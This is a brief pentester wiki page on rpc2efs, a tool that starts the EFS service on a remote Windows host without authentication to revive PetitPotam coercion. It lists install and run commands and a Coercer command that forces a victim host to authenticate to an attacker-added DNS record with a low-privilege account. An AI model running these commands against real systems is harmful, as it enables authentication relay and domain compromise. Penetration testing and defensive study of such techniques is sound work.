7 Minute Security Wiki v0.7

rpc2efs.md

By

A cool tool for performing "Unauthenticated start EFS service on remote Windows host (make PetitPotam great again)."

Install/run

Get impacket, then:

# Clone repo:
git clone https://github.com/Hypnoze57/rpc2efs.git

# Install impacket if needed
python3 -m venv venv
source venv/bin/activate
pip install impacket

# Politely ask EFS to run:
python3 rpc2efs.py ip.address.of.victim

# Once run, the output should say:
# [*] EFS should be running now.

Attack

coercer coerce --auth-type http -u lowpriv -p 'MyPassLOL!' -l ROGUE-DNS-RECORD-I-ADDED-PREVIOUSLY -t ip.of.victim2.coerce --filter-pipe-name efsrpc

See also

Coercer coerces things to talk to other things!

I believe this only coerces an SMB connection. More info here.

Last updated on 2026-03-22